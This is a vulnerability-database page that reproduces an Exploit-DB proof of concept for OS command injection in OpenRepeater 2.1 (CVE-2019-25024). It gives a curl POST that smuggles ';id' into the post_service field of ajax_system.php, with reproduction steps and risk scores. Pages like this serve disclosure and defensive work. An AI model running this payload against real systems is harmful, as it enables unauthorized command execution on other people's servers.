Lucene search
K

OpenRepeater 2.1 - OS Command Injection

🗓️ 03 Dec 2025 00:00:00Reported by CodeSecLabType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 149 Views

OpenRepeater 2.1 OS command injection via a vulnerable endpoint; PoC executes a command using POST.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for OS Command Injection in Alleghenycreative Openrepeater
19 Feb 202115:05
githubexploit
Circl
CVE-2019-25024
4 Dec 202521:02
circl
CNNVD
Aaron Crawford OpenRepeater Operating System Command Injection Vulnerability
18 Feb 202100:00
cnnvd
Check Point Advisories
OpenRepeater Command Injection (CVE-2019-25024)
8 Mar 202100:00
checkpoint_advisories
CVE
CVE-2019-25024
19 Feb 202103:37
cve
Cvelist
CVE-2019-25024
19 Feb 202103:37
cvelist
NVD
CVE-2019-25024
19 Feb 202104:15
nvd
OSV
CVE-2019-25024
19 Feb 202104:15
osv
Packet Storm
📄 OpenRepeater 2.1 Command Injection
3 Dec 202500:00
packetstorm
Prion
Command injection
19 Feb 202104:15
prion
Rows per page
# Exploit Title: OpenRepeater  2.1 - OS Command Injection 
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/OpenRepeater/openrepeater
# Software Link: https://github.com/OpenRepeater/openrepeater
# Version: 2.1 
# Tested on: Ubuntu
# CVE : CVE-2019-25024


Proof Of Concept
# PoC for OS Command Injection in OpenRepeater before version 2.2

# The target URL for the vulnerable endpoint
TARGET_URL="http://openrepeater/functions/ajax_system.php"

# The payload to execute an arbitrary command, e.g., 'id' to demonstrate the vulnerability
PAYLOAD="post_service=;id"

# Sending the payload using curl
curl -X POST -d "$PAYLOAD" "$TARGET_URL"


Steps to Reproduce:
1. Send the POST request.
2. Observe the result and injected command (e.g., uid=...) will appear.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Dec 2025 00:00Current
9.5High risk
Vulners AI Score9.5
CVSS 3.19.8
CVSS 210
EPSS0.62574
149